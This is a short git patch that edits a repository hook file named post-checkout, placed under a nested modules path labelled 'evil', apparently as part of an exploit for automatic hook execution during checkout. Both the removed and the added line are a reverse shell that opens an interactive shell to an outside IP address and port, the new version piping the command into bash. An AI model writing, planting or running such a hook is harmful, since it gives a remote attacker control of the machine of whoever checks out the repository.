From 37495087d18175a1c12c5a09181e98fcd238afe0 Mon Sep 17 00:00:00 2001 From: z0rs Date: Thu, 11 Jan 2024 23:46:38 -0600 Subject: [PATCH] Update modules/1/2/3/4/evil/hooks/post-checkout --- modules/1/2/3/4/evil/hooks/post-checkout | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/1/2/3/4/evil/hooks/post-checkout b/modules/1/2/3/4/evil/hooks/post-checkout index 22bccf1..1dc3754 100755 --- a/modules/1/2/3/4/evil/hooks/post-checkout +++ b/modules/1/2/3/4/evil/hooks/post-checkout @@ -1,2 +1,2 @@ #!/bin/sh -sh -i >& /dev/tcp/104.237.143.51/8337 0>&1 \ No newline at end of file +echo "sh -i >& /dev/tcp/104.237.143.51/8337 0>&1" | bash \ No newline at end of file